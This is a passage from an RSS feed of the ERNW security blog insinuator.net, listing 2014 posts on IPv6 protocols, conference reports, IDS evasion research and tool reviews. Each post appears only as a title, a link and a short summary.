      <guid>https://insinuator.net/2014/11/ipv6-for-ipv4-experts/</guid>
      <description>&lt;p&gt;If any of you is interested in the intricacies of IPv6 Neighbor Discovery (ND) I briefly referred to in the course of &lt;a href=&#34;http://www.insinuator.net/2014/10/router-advertisement-options-to-the-rescue-a-deep-dive-into-dhcpv6-part-2/&#34;&gt;my series on DHCPv6&lt;/a&gt;, I recommend reading section 5.2 “The Host, the Link, and the Subnet in IPv6” of Yar Tikhiy’s excellent ebook “IPv6 for IPv4 Experts”. It can &lt;a href=&#34;https://sites.google.com/site/yartikhiy/home/ipv6book&#34;&gt;be found here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Best&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;</description>
    </item>
    <item>
      <title>I Don’t Have Any Neighbors – A Deep Dive into DHCPv6, Part 1</title>
      <link>https://insinuator.net/2014/10/i-dont-have-any-neighbors-a-deep-dive-into-dhcpv6-part-1/</link>
      <pubDate>Fri, 31 Oct 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/10/i-dont-have-any-neighbors-a-deep-dive-into-dhcpv6-part-1/</guid>
      <description>&lt;p&gt;Probably due to the (“secondary”) role it has been historically assigned within the IPv6 universe, DHCPv6 is a protocol which is very different from its IPv4 counterpart. Some of the differences and similarities have been discussed recently (e.g. see &lt;a href=&#34;https://twitter.com/SCOTTHOGG&#34;&gt;Scott Hogg&lt;/a&gt;‘s article on “&lt;a href=&#34;https://community.infoblox.com/blogs/2014/10/21/high-availability-dhcpv6&#34;&gt;High Availability DHCPv6&lt;/a&gt;“). This post aims at covering a fundamental, yet widely unknown or misunderstood difference, that is the properties of DHCPv6 addresses and their behavior on the local-link.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Router Advertisement Options to the Rescue – A Deep Dive into DHCPv6, Part 2</title>
      <link>https://insinuator.net/2014/10/router-advertisement-options-to-the-rescue-a-deep-dive-into-dhcpv6-part-2/</link>
      <pubDate>Fri, 31 Oct 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/10/router-advertisement-options-to-the-rescue-a-deep-dive-into-dhcpv6-part-2/</guid>
      <description>&lt;p&gt;This is the sequel post to the &lt;a href=&#34;http://www.insinuator.net/2014/10/i-dont-have-any-neighbors-a-deep-dive-into-dhcpv6-part-1/&#34;&gt;first part&lt;/a&gt; in which I mainly covered some elements of the specification wrt the “on-link” flag and the IPv6 subnet model.&lt;br&gt;&#xA;In short each IPv6 address has an associated flag which determines if the host considers the respective address to be part of “a network where neighbors exist”. If this is the case ND is performed to talk to them, otherwise all communication with other hosts on that prefix is sent to the router. This flag is NOT set for DHCPv6 addresses (and, btw, just to make this clear already, there’s no way of setting it as part of the DHCP configuration procedure either) so communication with hosts with the same DHCPv6 provided prefix is supposed to go through a router, which in turn is very different (behavior) from the IPv4 world.&lt;/p&gt;</description>
    </item>
    <item>
      <title>LTE vs. Darwin @ Hackers to Hackers Conference 11</title>
      <link>https://insinuator.net/2014/10/lte-vs.-darwin-@-hackers-to-hackers-conference-11/</link>
      <pubDate>Sun, 19 Oct 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/10/lte-vs.-darwin-@-hackers-to-hackers-conference-11/</guid>
      <description>&lt;p&gt;Hello Everybody and greetings from Sao Paulo,&lt;/p&gt;&#xA;&lt;p&gt; &lt;br&gt;&#xA;We’re currently enjoying the Brazilian sunshine, waiting for H2H2 11’s closing remarks and decided to give you a few details on the past three days. The conference was opened by a short welcome by our fellow Trooper Rodrigo Rubira Branco and stuffed with loads of great talks. This year’s keynotes came from Daniel J. Bernstein and Halvar Flake and gave yet another insight into the ever changing world of InfoSec. The international lineup also included Travis Goodspeed, Sergej Bratus and Fernando Gont. H2HC was a great chance for us to talk to various Hackers from around the world and share our opinions and knowledge.We can only warmly recommend a visit to next year’s H2HC in Sao Paulo.&lt;br&gt;&#xA;Many many thanks to Rodrigo, Laila and the rest of the team for an awesome weekend. And a quick hello to all new followers on Insinuator.net, we’re looking forward to meeting you all again, soon.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A “Please, Don’t Waste my Time” Approach and the Sourcefire/Snort Evasion</title>
      <link>https://insinuator.net/2014/10/a-please-dont-waste-my-time-approach-and-the-sourcefire/snort-evasion/</link>
      <pubDate>Sat, 18 Oct 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/10/a-please-dont-waste-my-time-approach-and-the-sourcefire/snort-evasion/</guid>
      <description>&lt;p&gt;This is a guest post from &lt;a href=&#34;http://www.secfu.net/about-me/&#34;&gt;Antonios Atlasis&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Yesterday we (Rafael Schaefer, Enno and me) had the pleasure to deliver together our talk at BlackHat Europe 2014 named &lt;a href=&#34;https://www.blackhat.com/eu-14/briefings.html#evasion-of-high-end-idps-devices-at-the-ipv6-era&#34;&gt;Evasion of High-End IDPS Devices at the IPv6 Era&lt;/a&gt; (by the way, latest slides can be found &lt;a href=&#34;https://www.ernw.de/download/Atlasis_Rey_Schaefer_BHEU_2014_Evasion_of_HighEnd_IPS_Devices.pdf&#34;&gt;here&lt;/a&gt; and the white paper &lt;a href=&#34;https://www.ernw.de/download/eu-14-Atlasis-Rey-Schaefer-briefings-Evasion-of-HighEnd-IPS-Devices-wp.pdf&#34;&gt;here&lt;/a&gt;). In this talk we summarised all the IDPS evasion techniques that we have found so far. At previous blogposts I had the chance to describe how to evade &lt;a href=&#34;http://www.insinuator.net/2014/08/evading-idps-by-combining-ipv6-extension-headers-and-fragmentation-features-the-story-of-my-life/&#34;&gt;Suricata&lt;/a&gt; and &lt;a href=&#34;http://www.insinuator.net/2014/05/a-novel-way-of-abusing-ipv6-extension-headers-to-evade-ipv6-security-devices/&#34;&gt;TippingPoint&lt;/a&gt;. In this post I am going to describe some other techniques that can be used to evade &lt;a href=&#34;https://www.snort.org/&#34;&gt;Snort&lt;/a&gt;, and its companion commercial version, &lt;a href=&#34;http://www.sourcefire.com/&#34;&gt;Sourcefire&lt;/a&gt;. The tool used to evade these IDPS is –  what else – &lt;a href=&#34;http://www.insinuator.net/2014/10/chiron-an-all-in-one-ipv6-penetration-testing-framework/&#34;&gt;Chiron&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Deaggregation by large organizations</title>
      <link>https://insinuator.net/2014/10/deaggregation-by-large-organizations/</link>
      <pubDate>Wed, 15 Oct 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/10/deaggregation-by-large-organizations/</guid>
      <description>&lt;p&gt;Some hours ago &lt;a href=&#34;https://twitter.com/iljitsch&#34;&gt;Iljitsch van Beijnum&lt;/a&gt; posted &lt;a href=&#34;https://www.ripe.net/ripe/mail/archives/bcop/2014-October/000079.html&#34;&gt;an email&lt;/a&gt; with the above subject to the RIPE Best Current Operational Practices (BCOP) &lt;a href=&#34;https://www.ripe.net/mailman/listinfo/bcop&#34;&gt;mailing list&lt;/a&gt;.&lt;br&gt;&#xA;Therein he describes the growing issue of (IPv6 prefix) deaggregation desires/approaches by certain organizations vs. the filtering practices of other organizations (providers). I touched this problem, from an enterprise’s perspective, some time ago in the &lt;a href=&#34;http://www.insinuator.net/2014/01/ipv6-address-plan-considerations-part-2-the-pi-space-from-singlemultiple-rirs-debate/&#34;&gt;second part&lt;/a&gt; of my blog post series on &lt;a href=&#34;http://www.insinuator.net/2014/05/ipv6-address-plan-considerations-part-3-the-plan/&#34;&gt;IPv6 address planning&lt;/a&gt;. Given we think that the discussion is heavily needed from several angles, I had actually submitted a talk on the topic twice (for the RIPE meeting in Warsaw in May and the upcoming one in London) which was unfortunately rejected at both occasions.&lt;br&gt;&#xA;I’m hence very happy to see that a dialogue about the inherent dilemma might be started by Iljitsch’s mail. As a contribution to the development of a BCOP document I will hereby publish our &lt;a href=&#34;https://www.ernw.de/download/RIPE69_Rey_Langner_Slash48_Considered_Harmful_v082_DRAFT.pdf&#34;&gt;draft slides&lt;/a&gt; of the talk which was initially planned. Furthermore two fellow IPv6 practitioners (Hi Roland &amp;amp; Nico!) and I plan to release a detailed paper with research results as for IPv6 prefix distribution at major European IXs in the near future.&lt;/p&gt;</description>
    </item>
    <item>
      <title>North American IPv6 Summit 2014</title>
      <link>https://insinuator.net/2014/10/north-american-ipv6-summit-2014/</link>
      <pubDate>Tue, 14 Oct 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/10/north-american-ipv6-summit-2014/</guid>
      <description>&lt;p&gt;Hello everyone,&lt;/p&gt;&#xA;&lt;p&gt;I know I am a bit late with this post, but I was speaking on the &lt;a href=&#34;http://www.rmv6tf.org/na-ipv6-summit/2014-na-ipv6-summit&#34;&gt;North American IPv6 Summit&lt;/a&gt; in Denver three weeks ago. The focus of my talk was on &lt;em&gt;&lt;a href=&#34;https://www.ernw.de/download/TROOPERS_IPv6SecSummit_ERNW_IPv6_Structural_Deficits.pdf&#34;&gt;Why IPv6 Security is hard – Structural Deficits of IPv6 &amp;amp; Their Implications&lt;/a&gt;&lt;/em&gt; (slightly modified/updated from the &lt;a href=&#34;https://www.troopers.de/troopers14/troopers14-ipv6-security-summit-2014/index.html&#34;&gt;Troopers IPv6 Security Summit&lt;/a&gt;).  We consider the NA IPv6 Summit as one of the most important IPv6 events at all and we were happy to contribute to the overall success. The conference was organized for the 7^(th) time by the &lt;a href=&#34;http://www.rmv6tf.org/&#34;&gt;Rocky Mountain IPv6 Task Force&lt;/a&gt; and took place in the Grand Hyatt Denver (37th floor ;-)). Luckily the weather was perfect, and the view of the landscape from the conference rooms was just amazing. I really enjoyed the time in Denver, as the organizer sdid all they could to treat the speaker well J. The talks were of mix of regular research or case-study type talks and some sponsored talks ranging from deployment experience, security and statistics to SDN (Yes, I said it ;)) and the Internet of Things (I said it again ;)). The line-up was nicely put together.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Chiron – An All-In-One IPv6 Penetration Testing Framework</title>
      <link>https://insinuator.net/2014/10/chiron-an-all-in-one-ipv6-penetration-testing-framework/</link>
      <pubDate>Sat, 04 Oct 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/10/chiron-an-all-in-one-ipv6-penetration-testing-framework/</guid>
      <description>&lt;p&gt;This is a guest post from &lt;a href=&#34;http://www.secfu.net/about-me/&#34;&gt;Antonios Atlasis&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Last week I had the pleasure to give you my impressions regarding my experience about &lt;a href=&#34;http://www.insinuator.net/2014/09/hacking-for-a-b33r-at-ghent/&#34;&gt;&lt;em&gt;hacking for b33r at Ghent&lt;/em&gt;&lt;/a&gt;, that is, my participation at &lt;a href=&#34;http://2014.brucon.org/&#34;&gt;&lt;em&gt;BruCON 2014&lt;/em&gt;&lt;/a&gt; hacking conference. As I said among else, the reason that I was there was to present &lt;a href=&#34;http://www.secfu.net/tools-scripts/&#34;&gt;&lt;em&gt;Chiron&lt;/em&gt;&lt;/a&gt;, my IPv6 penetration testing/security assessment framework, which was supported by the &lt;a href=&#34;http://blog.brucon.org/2013/12/2014-5by5-announcement.html&#34;&gt;&lt;em&gt;Brucon 5×5&lt;/em&gt;&lt;/a&gt; program. The first version of &lt;em&gt;Chiron&lt;/em&gt; had been presented at &lt;a href=&#34;https://www.troopers.de/troopers14/troopers14-ipv6-security-summit-2014/troopers14-ipv6-security-summit-2014-workshop-an-all-in-one-advanced-ipv6-testing-framework/index.html&#34;&gt;Troopers 14&lt;/a&gt;, during the &lt;a href=&#34;https://www.troopers.de/troopers14/troopers14-ipv6-security-summit-2014/index.html&#34;&gt;&lt;em&gt;IPv6 Security Summit&lt;/em&gt;&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>“Hacking for a B33r” at Ghent</title>
      <link>https://insinuator.net/2014/09/hacking-for-a-b33r-at-ghent/</link>
      <pubDate>Sat, 27 Sep 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/09/hacking-for-a-b33r-at-ghent/</guid>
      <description>&lt;p&gt;This is a guest post by &lt;a href=&#34;http://www.secfu.net/about-me/&#34;&gt;Antonios Atlasis&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;This week I had the pleasure to attend &lt;a href=&#34;http://2014.brucon.org/&#34;&gt;BruCON 2014&lt;/a&gt;. While participating at the &lt;em&gt;Brucon 5×5&lt;/em&gt; program, I had also the chance to attend this well-known European Con which is held in the beautiful city of Ghent.&lt;/p&gt;&#xA;&lt;p&gt;The main event took place two days (on 25th and 26th of September), while some very interesting trainings were given in the previous days. There was mainly one track, plus some workshops that you could also attend, if you wished. You could book your seat at one of the workshops using an &lt;a href=&#34;http://sched.brucon.org/&#34;&gt;on-line scheduling system&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Implications of Disruptive Technologies</title>
      <link>https://insinuator.net/2014/09/security-implications-of-disruptive-technologies/</link>
      <pubDate>Sat, 20 Sep 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/09/security-implications-of-disruptive-technologies/</guid>
      <description>&lt;p&gt;Yesterday I gave a talk with the above title in a private setting. Given it might be of interest for some of you, the slides can be found &lt;a href=&#34;https://www.ernw.de/download/ERNW_Security_Implications_of_Disruptive_Technologies_web.pdf&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Have a great weekend everybody&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;</description>
    </item>
    <item>
      <title>MLD and Neighbor Discovery. Are They Related?</title>
      <link>https://insinuator.net/2014/09/mld-and-neighbor-discovery.-are-they-related/</link>
      <pubDate>Wed, 03 Sep 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/09/mld-and-neighbor-discovery.-are-they-related/</guid>
      <description>&lt;p&gt;This is a guest post from &lt;a href=&#34;http://www.secfu.net/about-me/&#34;&gt;Antonios Atlasis&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Today we had the opportunity at ERNW to have a full-day discussion about MLD. The discussion was led by Jayson Salazar who writes his thesis on the topic.&lt;/p&gt;&#xA;&lt;p&gt;For the newcomers to IPv6 world, the purpose of MLD, a subprotocol of IPv6, as defined in &lt;a href=&#34;http://tools.ietf.org/html/rfc2710&#34;&gt;RFC 2710&lt;/a&gt;, is “&lt;em&gt;to enable each IPv6 router to discover the presence of multicast listeners (that is, nodes wishing to receive multicast packets) on its directly attached links, and to discover specifically which multicast addresses are of interest to those neighboring nodes.&lt;/em&gt;” MLD was updated by MLDv2 in &lt;a href=&#34;http://tools.ietf.org/html/rfc3810&#34;&gt;RFC 3810&lt;/a&gt; in order to “&lt;em&gt;add the ability for a node to report interest in listening to packets with a particular multicast address only from specific source addresses or from all sources except for specific source addresses.&lt;/em&gt;”&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW’s Top 9 Burp Plugins</title>
      <link>https://insinuator.net/2014/08/ernws-top-9-burp-plugins/</link>
      <pubDate>Mon, 25 Aug 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/08/ernws-top-9-burp-plugins/</guid>
      <description>&lt;p&gt;In the context of an internal evaluation, we recently had a look at most of the burp plugins available from the BApp store. The following overview represents our personal top 9 plugins, categorized in “Scanner Extensions”, “Manual Testing” and “Misc” in alphabetic order:&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Scanner Extensions&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;ActiveScan++&lt;/p&gt;&#xA;&lt;p&gt;This plugin adds some tests for Dynamic code injection, &lt;a href=&#34;http://carlos.bueno.org/2008/06/host-header-injection.html&#34; title=&#34;Host header attacks&#34;&gt;Host header attacks&lt;/a&gt; (&lt;a href=&#34;http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html&#34; title=&#34;Password reset poisoning&#34;&gt;password reset poisoning&lt;/a&gt;, &lt;a href=&#34;https://www.owasp.org/index.php/Cache_Poisoning&#34; title=&#34;cache poisoning&#34;&gt;cache poisoning&lt;/a&gt;, DNS rebinding), OS command injection and &lt;a href=&#34;http://www.thespanner.co.uk/2014/03/21/rpo/&#34; title=&#34;Relative path overwrite&#34;&gt;Relative path overwrite&lt;/a&gt;. In some internal tests, it seemed to deliver what it promises.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Atomic Fragments vs. Fragmentation in the IPv6 “Real World”</title>
      <link>https://insinuator.net/2014/08/atomic-fragments-vs.-fragmentation-in-the-ipv6-real-world/</link>
      <pubDate>Thu, 21 Aug 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/08/atomic-fragments-vs.-fragmentation-in-the-ipv6-real-world/</guid>
      <description>&lt;p&gt;This is a guest post by &lt;a href=&#34;http://www.secfu.net/about-me/&#34;&gt;Antonios Atlasis&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Continuing the &lt;a href=&#34;http://www.insinuator.net/2014/08/packet-too-big-messages-and-atomic-fragments/&#34;&gt;discussion&lt;/a&gt; about the IPv6 Atomic Fragments &lt;a href=&#34;http://lists.si6networks.com/pipermail/ipv6hackers/2014-August/001638.html&#34;&gt;started&lt;/a&gt; at the &lt;a href=&#34;http://lists.si6networks.com/listinfo/ipv6hackers/&#34;&gt;IPv6 hacker’s mailing list&lt;/a&gt; and the &lt;a href=&#34;http://www.ietf.org/id/draft-gont-v6ops-ipv6-ehs-in-real-world-00.txt&#34;&gt;freshly proposed draft RFC&lt;/a&gt; regarding &lt;a href=&#34;http://www.ietf.org/internet-drafts/draft-gont-6man-deprecate-atomfrag-generation-00.txt&#34;&gt;the deprecation of the generation of IPv6 Atomic Fragments&lt;/a&gt;, we decided to check very quickly what is the current situation regarding the acceptance or the rejection of Atomic fragments in the “real world”. Thanks to Rafael Schaefer and the RISC lab at ERNW, we got some first measurements really fast.&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackRF One the story continues…</title>
      <link>https://insinuator.net/2014/08/hackrf-one-the-story-continues/</link>
      <pubDate>Wed, 20 Aug 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/08/hackrf-one-the-story-continues/</guid>
      <description>&lt;p&gt;Hello fellow frequency hoppers,&lt;/p&gt;&#xA;&lt;p&gt;once again, we welcomed Michael Ossmann at the ERNW headquarters for fun with SDR. This time with Mike´s advanced SDR workshop. And to be up front about it…it was plain awesome. For everybody who is not familiar with Software Defined Radio (SDR): Let’s regard it as the ultimate tool when working with radio signals. Take a look a &lt;a href=&#34;http://www.insinuator.net/2013/08/hack-rf/#more-2539&#34; title=&#34;HackRF&#34;&gt;this&lt;/a&gt; to learn more.&lt;/p&gt;&#xA;&lt;p&gt;Mike showed us the new revision of his HackRF One and explained us some more advanced techniques when it comes to Radio Frequnecies hacking. Compared to last time, the workshop focused on reversing signals and how to synthesize them. So this time we were crafting RF packets ourselves instead of just replaying a capture. This introduces different attack types which can be carried out over the air for  example bruteforcing or fuzzing of radio devices.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Packet Too Big Messages and Atomic Fragments</title>
      <link>https://insinuator.net/2014/08/packet-too-big-messages-and-atomic-fragments/</link>
      <pubDate>Wed, 20 Aug 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/08/packet-too-big-messages-and-atomic-fragments/</guid>
      <description>&lt;p&gt;This is a guest post from &lt;a href=&#34;http://www.secfu.net/about-me/&#34;&gt;Antonios Atlasis&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Taking the chance from &lt;a href=&#34;http://lists.si6networks.com/pipermail/ipv6hackers/2014-August/001638.html&#34;&gt;a discussion&lt;/a&gt; on the &lt;a href=&#34;http://lists.si6networks.com/listinfo/ipv6hackers/&#34;&gt;IPv6 hacker’s mailing list&lt;/a&gt; and the &lt;a href=&#34;http://www.ietf.org/id/draft-gont-v6ops-ipv6-ehs-in-real-world-00.txt&#34;&gt;freshly proposed draft RFC&lt;/a&gt; regarding &lt;a href=&#34;http://www.ietf.org/internet-drafts/draft-gont-6man-deprecate-atomfrag-generation-00.txt&#34;&gt;the deprecation of the generation of IPv6 Atomic Fragments&lt;/a&gt;, I decided to test very quickly what is the current status related with the latest and some of the most poplar Operating Systems (OS) status (whether they send Atomic Fragments in response to Packet Too Big messages, or not). The motivation behind this was to check which one of them is potentially vulnerable to the DoS attack using the technique described in the above proposed RFC and taking it for granted that Atomic Fragments are blocked in the real world (but more about this, in another blogpost in the near future).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Wrap-Up: A Memorable Week at Black Hat and DEFCON in Las Vegas</title>
      <link>https://insinuator.net/2014/08/wrap-up-a-memorable-week-at-black-hat-and-defcon-in-las-vegas/</link>
      <pubDate>Fri, 15 Aug 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/08/wrap-up-a-memorable-week-at-black-hat-and-defcon-in-las-vegas/</guid>
      <description>&lt;p&gt;Information security conferences are known to be attended because of several reasons. For some it’s the technical content, for others the networking potential and for some others simply meeting old friends. Pinpointing our motives is clearly a challenging task, but the following wrap-up ought to share our personal highlights of the week we spent visiting Black Hat USA 2014 and DEFCON 22 in Las Vegas.&lt;/p&gt;&#xA;&lt;p&gt;After somewhat 18 hours of flight, some sleep and with the beautiful scenery of perpetual clear skies above Las Vegas we began what was to be an incredible week.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW @BlackHat US 2014</title>
      <link>https://insinuator.net/2014/08/ernw-@blackhat-us-2014/</link>
      <pubDate>Tue, 12 Aug 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/08/ernw-@blackhat-us-2014/</guid>
      <description>&lt;p&gt;Last week we had the opportunity and pleasure to present some of our research results at BlackHat US 2014 (besides of meeting a lot of old friends and having a great researchers’ dinner).&lt;/p&gt;&#xA;&lt;p&gt;Enno and Antonios gave their presentation on IDPS evasion by IPv6 Extension Headers, described &lt;a href=&#34;http://www.insinuator.net/2014/08/evading-idps-by-combining-ipv6-extension-headers-and-fragmentation-features-the-story-of-my-life/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;The material can be found here: &lt;a href=&#34;https://www.ernw.de/download/Atlasis_Rey_BHUSA_2014_IPv6_Evasion_of_HighEnd_IPS_Devices_web.pdf&#34;&gt;Slides&lt;/a&gt;, &lt;a href=&#34;http://www.secfu.net/tools-scripts/&#34;&gt;tools&lt;/a&gt; (the main tool used was Chiron, authored by Antonios) &amp;amp; &lt;a href=&#34;https://www.ernw.de/download/us-14-Atlasis-Evasion-Of-HighEnd-IPS-Devices-In-The-Age-Of-IPv6-WP.pdf&#34;&gt;whitepaper&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Ayhan and me presented our results of the security analysis of Cisco’s EnergyWise protocol. The protocol enables network-wide power monitoring and control (ie turning servers off or on, putting phones to standby — basically controlling the power state of all EnergyWise-enabled or PoE devices). The main problem (besides a DoS vulnerability we found in IOS, see &lt;a href=&#34;http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140806-energywise&#34;&gt;official Cisco advisory&lt;/a&gt;) is its PSK-based authentication model, which enables an attacker to cause large-scale blackouts in data centers if the deployment is lacking certain controls (for example our good old favorite, segmentation…). There will be a longer blogpost/newsletter on this topic soon.&lt;br&gt;&#xA;The material can be found here: &lt;a href=&#34;https://www.ernw.de/download/ERNW_BHUS14_WhenTheLightsGoOut_akoca-mluft.pdf&#34;&gt;Slides&lt;/a&gt; &amp;amp; &lt;a href=&#34;https://www.ernw.de/download/tools/energywise_attack_suite_BH_US14.zip&#34;&gt;tools&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some notes on VMware vCenter Operations Manager</title>
      <link>https://insinuator.net/2014/08/some-notes-on-vmware-vcenter-operations-manager/</link>
      <pubDate>Tue, 12 Aug 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/08/some-notes-on-vmware-vcenter-operations-manager/</guid>
      <description>&lt;p&gt;While fairytales often start with “Once upon a time…”, our blogposts often start with “During a recent security assessment…” — and so does this one. This time we were able to spend some time on VMware’s &lt;a href=&#34;http://www.vmware.com/products/vcenter-operations-manager&#34;&gt;vCenter Operations Manager&lt;/a&gt; (herein short: VCOPS). VCOPS is a monitoring solution for load and health of your vSphere environment. In order to provide this service, two virtual machines (analytics engine and Web-based UI) must be deployed (as a so-called vApp) that are configured on startup by various scripts (mainly /usr/lib/vmware-vcops/user/conf/install/firstbootcommon.sh) to match the actual environment and communicate via an OpenVPN tunnel that is established directly between the two machines. To gather the monitoring data, read-only access to the vCenter is required.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Evading IDPS by Combining IPv6 Extension Headers and Fragmentation “Features” – The Story of My Life…</title>
      <link>https://insinuator.net/2014/08/evading-idps-by-combining-ipv6-extension-headers-and-fragmentation-features-the-story-of-my-life/</link>
      <pubDate>Sat, 09 Aug 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/08/evading-idps-by-combining-ipv6-extension-headers-and-fragmentation-features-the-story-of-my-life/</guid>
      <description>&lt;p&gt;This is a guest post from &lt;a href=&#34;http://www.secfu.net/about-me/&#34;&gt;Antonios Atlasis&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;In the “&lt;a href=&#34;http://www.insinuator.net/2014/05/a-novel-way-of-abusing-ipv6-extension-headers-to-evade-ipv6-security-devices/&#34;&gt;A Novel Way of Abusing IPv6 Extension Headers to Evade IPv6 Security Devices&lt;/a&gt;” blogpost I described a way to evade a high-end commercial IDPS device, the Tipping Point IDPS (TOS Tipping Point, Package 3.6.1.4036 and vaccine 3.2.0.8530 digital), by abusing a minor detail at the IPv6 specification. As I promised at the end of that blogpost, this is not the end. In this blogpost I am going to describe several new and different ways of evading another popular IDPS, an open-source one this time, &lt;a href=&#34;http://suricata-ids.org/&#34;&gt;Suricata&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some Things to Consider when Using EMET</title>
      <link>https://insinuator.net/2014/08/some-things-to-consider-when-using-emet/</link>
      <pubDate>Fri, 08 Aug 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/08/some-things-to-consider-when-using-emet/</guid>
      <description>&lt;p&gt;In the light of the recent release of version 5.0 of Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) on July 31, it seems to be more than appropriate to talk a bit about the new features and some general things to take into account when using EMET (for the new certificate pinning feature of EMET 4.0, see &lt;a href=&#34;http://www.insinuator.net/2013/07/emet-v4-0-with-new-certificate-trust-feature-released/&#34; title=&#34;Certificate Pinning&#34;&gt;Friedwart’s comment&lt;/a&gt;). For all of you who don’t know EMET, in short, it’s a free mitigation tool for Windows developed by Microsoft, helping the user by preventing vulnerabilities in software from being successfully exploited. The tool works by protecting applications via a number of security mitigation technologies, vastly extending Windows operating system mitigation capabilities as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Cisco Cloud Services Router 1000V and the Virtual Matryoshka</title>
      <link>https://insinuator.net/2014/07/cisco-cloud-services-router-1000v-and-the-virtual-matryoshka/</link>
      <pubDate>Mon, 28 Jul 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/07/cisco-cloud-services-router-1000v-and-the-virtual-matryoshka/</guid>
      <description>&lt;p&gt;Recently we started playing around with Cisco’s virtual router, the CSR 1000V, while doing some protocol analysis. We found Cisco offering an BIN file for download (alternatively there is an ISO file which contains a GRUB boot loader and the BIN file, or an OVA file which contains a virtual machine description and the ISO file) and file(1) identifies it as DOS executable:&lt;/p&gt;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ file csr1000v-universalk9.03.12.00.S.154-2.S-std.SPA.bin &#xA;    csr1000v-universalk9.03.12.00.S.154-2.S-std.SPA.bin: DOS executable (COM)&lt;/code&gt;&lt;/pre&gt;&#xA;&lt;p&gt;We didn’t manage to get the file running, neither in a (Free-)DOS environment, nor in a wine virtual DOS environment, except using the boot loader from the ISO file. So we became curious as for the structure and ingredients of the file.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 for Managers</title>
      <link>https://insinuator.net/2014/07/ipv6-for-managers/</link>
      <pubDate>Tue, 22 Jul 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/07/ipv6-for-managers/</guid>
      <description>&lt;p&gt;We’re currently involved in a number of IPv6 activities in different organizations and one of the questions we are still facing – even in cases where there’s already a (in most cases networking team driven/originated) “project” (incl. budget, project sponsor, milestones etc.) – is along the lines of “How to sell IPv6 to our management?”.&lt;/p&gt;&#xA;&lt;p&gt;In the following I will shortly lay out the line of reasoning and the terminology we usually employ for the task. Furthermore I’ve anonymized a presentation which we recently prepared as “input” for the network team of an enterprise organization; &lt;a href=&#34;https://www.ernw.de/download/ERNW_Why_IPv6_clean.pdf&#34;&gt;it can be found her&lt;/a&gt;e. In case you want to get this as a PPT (for recyling purposes) pls send me a direct email (in exchange, we might ask you for a small donation of your will to the &lt;a href=&#34;https://www.troopers.de/troopers-charity/index.html&#34;&gt;Troopers charity project&lt;/a&gt;… ).&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Requirements for Cloud Service Providers</title>
      <link>https://insinuator.net/2014/07/ipv6-requirements-for-cloud-service-providers/</link>
      <pubDate>Tue, 08 Jul 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/07/ipv6-requirements-for-cloud-service-providers/</guid>
